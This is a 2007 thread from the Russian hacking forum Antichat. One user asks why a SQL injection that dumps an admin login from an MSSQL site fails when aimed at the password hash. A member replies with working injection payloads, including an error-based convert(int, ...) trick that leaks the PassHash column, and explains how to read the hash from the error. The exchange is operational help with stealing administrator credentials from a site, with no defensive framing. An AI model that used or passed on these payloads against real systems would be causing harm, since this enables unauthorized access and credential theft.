25.08.2007, 10:12
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Ded MustD!e
Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос
1+or+1=(SELECT+TOP+1+Login+from+admin)--
он успешно выполняется, я вижу логин, затем пишу
1+or+1=(SELECT+TOP+1+PassHash+from+admin)--
и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся
Помогите, плиз!
для начала попробуй так:
Код:
1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')--
но скорее всего так:
Код:
1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qwerty')+from+admin)--
в таком случае твой хеш это то что будет идти до qwerty
__________________
Карфаген должен быть разрушен...
|
|
|